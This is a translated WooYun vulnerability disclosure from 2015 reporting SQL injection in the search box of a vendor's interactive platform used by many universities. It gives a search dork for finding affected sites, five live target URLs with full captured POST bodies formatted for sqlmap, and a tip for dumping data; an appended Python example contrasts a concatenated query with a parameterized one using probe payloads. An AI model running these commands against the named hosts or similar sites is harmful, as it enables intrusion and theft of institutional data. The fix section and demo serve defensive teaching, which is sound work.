
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-091245

Title: SQL injection in a certain system, affecting a large number of universities 1#

Vendor: 力拓网络科技

Author: limbo

Submitted: 2015-01-18 20:08

Fix deadline: 2015-04-18 20:10

Disclosed: 2015-04-18 20:10

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-18: Actively contacting the vendor and waiting for it to claim the report; details withheld from the public
2015-04-18: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

See title.

Details:

Affected vendor: 力拓网络科技
Affected product: the company's interactive ("互动") platform
Google search:
"技术支持:力拓网络科技" 互动

[Screenshot: 屏幕截图(575).png]


The affected sites are a number of universities.
The ctl00%24Content%24txtSearch parameter of VoteList.aspx is injectable.
It is the search box.
Capture the POST request to get the request body.
Five cases (each line is the target URL, the captured --data body, and the -p parameter to test):
http://183.64.83.109/hudong/VoteList.aspx --data "__VIEWSTATE=%2FwEPDwUJNTk0MTc3NzAyD2QWAmYPZBYCAgcPZBYEAgIPFgIeC18hSXRlbUNvdW50ZmQCAw9kFgYCAQ8WAh8AZmQCAw8WAh8AZmQCBQ8WAh8AZmRkWqzsjl7gZ9Hn8cvCLyoNIbDxHj0rdSOY0qNtBGECmto%3D&__EVENTVALIDATION=%2FwEWAwLmoOOqCQKUo4ebDwKU5KLrCKYhDKvnR0aykMLEP%2FT11baIO9BM3OFS81eQs4btcpOS&ctl00%24Content%24txtSearch=aaa&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
http://219.222.244.59:6006/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQEG5YWo6YOoFQEBMBQrAwFnFgFmZAIDDxAPFgIfAmdkEBUBBuWFqOmDqBUBATAUKwMBZxYBZmQCAg8WAh4LXyFJdGVtQ291bnRmZAIDD2QWBgIBDxYCHwNmZAIDDxYCHwNmZAIFDxYCHwNmZGSde1%2FYRyplEVcWTh7X3ikQxYOFTg%3D%3D&__VIEWSTATEGENERATOR=7EBB9B0A&__EVENTVALIDATION=%2FwEWBwKruosfAqDU8%2BsJArC72YUFAqji9NUMAriN3jsClKOHmw8ClOSi6wi9giGjZMFX1g5jsc04aasEHFe8qA%3D%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=j&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00$Content$txtSearch
http://119.145.248.165:83/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQUG5YWo6YOoNOWFieeUteWtkOaKgOacr%2BS4k%2BS4mi3lhYnnlLXmioDmnK%2FkuI5MRUTlupTnlKjmlrnlkJEx5YWJ55S15a2Q5oqA5pyv5LiT5LiaLeWFieWtpuWKoOW3peS4juajgOa1i%2BaWueWQkRjlhYnnlLXliLbpgKDmioDmnK%2FkuJPkuJoY57K%2B5a%2BG5py65qKw5oqA5pyv5LiT5LiaFQUBMAIxNQIxNgIxNwIxOBQrAwVnZ2dnZxYBZmQCAw8QDxYCHwJnZBAVAQblhajpg6gVAQEwFCsDAWcWAWZkAgIPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VBQExD%2BaYr%2BeahOWPkemAgeWIsAnmiLTlm5vnu7QBMQoyMDEzLTA5LTEyZAIDD2QWBgIBDxYCHwMCARYCZg9kFgJmDxUCATEP5piv55qE5Y%2BR6YCB5YiwZAIDDxYCHwMCAxYGZg9kFgJmDxUCATES5rWL6K%2BV6K%2Bd6aKY5L%2Bh5oGvZAIBD2QWAmYPFQIBMhvmnInnlpHpl67lj6%2Fku6Xmib7miJHllYrvvIFkAgIPZBYCZg8VAgEzC2ZmbWdtaG5oaHVqZAIFDxYCHwMCAxYGZg9kFgJmDxUCATEINDU2NjIxMTJkAgEPZBYCZg8VAgEyFWZkZmdoZ2hzZOS4jeaxguS4iuKApmQCAg9kFgJmDxUCATMk6K%2B36Zeu5bel56iL5YWJ5a2m5Z%2B656GA6Zq%2B5a2m5ZCX77yfZGRpHXzubD4rrBNsfsnT6RW3lhiLzA%3D%3D&__EVENTVALIDATION=%2FwEWCwLYq931DwKg1PPrCQKwu9mFBQKvu6WGBQKvu6GGBQKvu72GBQKvu%2FmFBQKo4vTVDAK4jd47ApSjh5sPApTkousIuJCx6%2F7GaEumNNLFGBlEnHQZsEc%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=AA&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
http://119.146.188.82:83/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQIG5YWo6YOoDOaVsOaOp%2BaKgOacrxUCATABMhQrAwJnZxYBZmQCAw8QDxYCHwJnZBAVAQblhajpg6gVAQEwFCsDAWcWAWZkAgIPFgIeC18hSXRlbUNvdW50ZmQCAw9kFgYCAQ8WAh8DZmQCAw8WAh8DZmQCBQ8WAh8DAgUWCmYPZBYCZg8VAgExJ%2BiAgeW4iOaCqOWlve%2B8geaLluaLieacuuaXgeeahOearuW4puKApmQCAQ9kFgJmDxUCATIn6K%2B36Zeu5rG96L2m55qE55S15Yqo5py65aSp56qX77yI5Y%2Bv4oCmZAICD2QWAmYPFQIBMyfogIHluIjmgqjlpb3vvIHmi5bmi4nmnLrml4HnmoTnmq7luKbigKZkAgMPZBYCZg8VAgE0I%2Bivt%2BmXru%2B8jOi9puWGhVBU5YmN55qE5a2U6KaB6ZK74oCmZAIED2QWAmYPFQIBNSfogIHluIjvvIHvvIHvvIHlpoLkvZXmj5Dpq5jlpJblla7lkIjigKZkZLYegLs9XdejpDbkNKorNshugArr&__EVENTVALIDATION=%2FwEWCAKZ453PCwKg1PPrCQKwu9mFBQKuu9mFBQKo4vTVDAK4jd47ApSjh5sPApTkousIvkXWLUWkJbdgF0aGxkMRawvDfjM%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=s&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
http://kjxyl.gdufs.edu.cn/hudong/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQIG5YWo6YOoDOWbvemZheWVhuWKoRUCATABMRQrAwJnZxYBZmQCAw8QDxYCHwJnZBAVAQblhajpg6gVAQEwFCsDAWcWAWZkAgIPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VBQExBTExMTExCeS%2Br%2BS4nOeFpwEwCjIwMTQtMDMtMjFkAgMPZBYGAgEPFgIfAwIBFgJmD2QWAmYPFQIBMQUxMTExMWQCAw8WAh8DZmQCBQ8WAh8DAgEWAmYPZBYCZg8VAgExC2hhamhmamthaGprZGTMp9jlurrWjxG0aTOfJy%2BA%2BjiKNA%3D%3D&__EVENTVALIDATION=%2FwEWCAL1q%2B6KAgKg1PPrCQKwu9mFBQKvu9mFBQKo4vTVDAK4jd47ApSjh5sPApTkousInWRIhDatCCqe4a%2FZsEmN28aHEwE%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=d&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
Paste each line into sqlmap (prefix it with `sqlmap -u`) and run it.
Results, in order:

[Screenshots: 屏幕截图(694).png, 屏幕截图(695).png, 屏幕截图(696).png, 屏幕截图(697).png, 屏幕截图(698).png, 屏幕截图(699).png, 屏幕截图(700).png, 屏幕截图(701).png, 屏幕截图(702).png]


That's all.

Proof of vulnerability:

Patch it, patch it, patch it.
Remember to add --no-cast (sqlmap's switch that turns off its payload casting mechanism) when dumping data.

[Screenshot: 屏幕截图(727).png]

Fix:

Filter the input. Properly: bind the search term as a query parameter instead of concatenating it into the SQL string; character filtering alone does not reliably stop this.
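As an added example (not from the original report and not the vendor's code): a minimal search handler that concatenates the search term into a LIKE clause, the way an injectable txtSearch handler does, beside the parameterized version the fix should use, together with the boolean-based true/false probe of the kind sqlmap runs against a parameter. It uses Python with an in-memory SQLite database so it runs anywhere; the table Vote with columns ID, Title and Published, and its rows, are constructed for this example and are not the vendor's schema. In ASP.NET the parameterized form is a SqlCommand whose values are added through cmd.Parameters rather than string concatenation.

```python
import sqlite3

# Constructed sample rows standing in for a poll/vote table. The table and
# column names (Vote, ID, Title, Published) and the rows are assumptions made
# for this example, not the vendor's schema or data.
SAMPLE_VOTES = [
    (1, "Library opening hours", 1),
    (2, "Dormitory network quality", 1),
    (3, "Unpublished draft poll", 0),
]


def make_db():
    """Fresh in-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Vote (ID INTEGER PRIMARY KEY, Title TEXT, Published INTEGER)"
    )
    conn.executemany("INSERT INTO Vote VALUES (?, ?, ?)", SAMPLE_VOTES)
    return conn


def search_vulnerable(conn, term):
    """Search built by string concatenation, the pattern behind an injectable
    txtSearch parameter: the term is pasted into the SQL text, so a quote in it
    closes the LIKE literal and whatever follows is parsed as SQL."""
    sql = (
        "SELECT ID, Title FROM Vote WHERE Published = 1 "
        "AND Title LIKE '%" + term + "%'"
    )
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Same search with a bound parameter: the term travels as data and is
    never parsed as SQL, whatever characters it contains."""
    sql = "SELECT ID, Title FROM Vote WHERE Published = 1 AND Title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


# Probe payloads. The leading quote closes the LIKE literal; "--" (a line
# comment in SQLite as in SQL Server) discards the trailing "%'" the handler
# appends. "' OR 1=1 --" also defeats the Published = 1 filter, so rows that
# were never meant to be listed come back.
TRUE_PAYLOAD = "' AND 1=1 --"
FALSE_PAYLOAD = "' AND 1=2 --"
DUMP_PAYLOAD = "' OR 1=1 --"


def boolean_probe(search, true_payload=TRUE_PAYLOAD, false_payload=FALSE_PAYLOAD):
    """Boolean-based check of the kind sqlmap runs against a parameter: send
    two payloads that differ only in a condition that is always true or always
    false. A different result set means the database evaluated the condition,
    i.e. the parameter is injectable. Each call uses a fresh database."""
    return search(make_db(), true_payload) != search(make_db(), false_payload)


def demo():
    """Run both handlers against the payloads and return the observations."""
    conn = make_db()
    return {
        "vulnerable_dump": search_vulnerable(conn, DUMP_PAYLOAD),
        "parameterized_dump": search_parameterized(conn, DUMP_PAYLOAD),
        "vulnerable_injectable": boolean_probe(search_vulnerable),
        "parameterized_injectable": boolean_probe(search_parameterized),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The concatenated handler returns the unpublished row for the OR payload and gives different answers to the 1=1 and 1=2 probes, which is exactly the signal sqlmap detects; the parameterized handler returns nothing for either, because the whole payload is only ever compared against titles.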

Copyright notice: please credit limbo@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused to respond.